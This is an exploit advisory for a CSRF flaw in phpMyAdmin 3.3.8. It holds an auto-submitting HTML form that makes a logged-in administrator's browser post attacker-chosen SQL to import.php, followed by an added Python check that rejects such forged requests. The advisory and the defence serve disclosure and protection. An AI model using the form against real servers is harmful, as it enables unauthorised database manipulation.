phpMyAdmin 3.3.8 CSRF sql code execution

2010.12.19
Credit: Gabry9191
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

<!--
           _
 ___ _ __ | |_   _  __ _
/ __| '_ \| | | | |/ _` |
\__ \ |_) | | |_| | (_| |
|___/ .__/|_|\__,_|\__,_|
    |_|

[+] Exploit Title : [0-day]phpMyAdmin 3.3.8 CSRF sql code execution
[+] Software Link: http://www.phpmyadmin.net/home_page/downloads.php
[+] Tested on: phpMyAdmin 3.3.8
[~] Authors : Gabry9191 - Foth - Vaghy -> Splua Hack Crew
[~] Bug hunted by : Gabry9191
[~] Date : 4/11/2010
-->
<form name="sqlform" id="sqlqueryform" enctype="multipart/form-data" action="https://[WEBSITE]/[phpMyAdmin Directory]/import.php" method="post">
  <textarea rows="0" cols="0" id="sqlquery" name="sql_query"> Sql Code To Injecting </textarea>
  <input type="submit" value="Esegui" name="SQL">
</form>
<script>document.body.onload = document.forms[0].submit();</script>
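
A server-side check that rejects an auto-submitted cross-site form like the one above, as an added example (not phpMyAdmin's code and not part of the original advisory): the request must carry a per-session token and a same-origin Origin or Referer header. The function names, the `token` field, the session dictionary and the host name are assumptions made for illustration.

```python
import hmac
import secrets
from urllib.parse import urlsplit

TRUSTED_ORIGIN = "https://pma.example.test"  # assumed deployment origin


def issue_token(session):
    """Create a per-session anti-CSRF token and store it server-side."""
    session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def same_origin(headers):
    """True if Origin (or, failing that, Referer) matches the trusted origin."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False  # state-changing POST with no provenance: reject
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" == TRUSTED_ORIGIN


def allow_sql_post(method, headers, form, session):
    """Decide whether a request carrying sql_query may be executed."""
    if method != "POST":
        return False, "state-changing request must be POST"
    if not same_origin(headers):
        return False, "cross-site or missing Origin/Referer"
    expected = session.get("csrf_token", "")
    supplied = form.get("token", "")
    # Constant-time comparison; an empty expected token never matches.
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False, "missing or invalid CSRF token"
    return True, "ok"


# Constructed sample requests (not captured traffic).
SESSION = {}
TOKEN = issue_token(SESSION)
# Shape of the advisory's form: foreign origin, no token field.
FORGED = dict(method="POST", headers={"Origin": "https://other.example.test"},
              form={"sql_query": "SELECT 1", "SQL": "Esegui"}, session=SESSION)
LEGIT = dict(method="POST", headers={"Origin": TRUSTED_ORIGIN},
             form={"sql_query": "SELECT 1", "token": TOKEN}, session=SESSION)

if __name__ == "__main__":
    print(allow_sql_post(**FORGED))  # rejected on origin
    print(allow_sql_post(**LEGIT))   # accepted
```
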

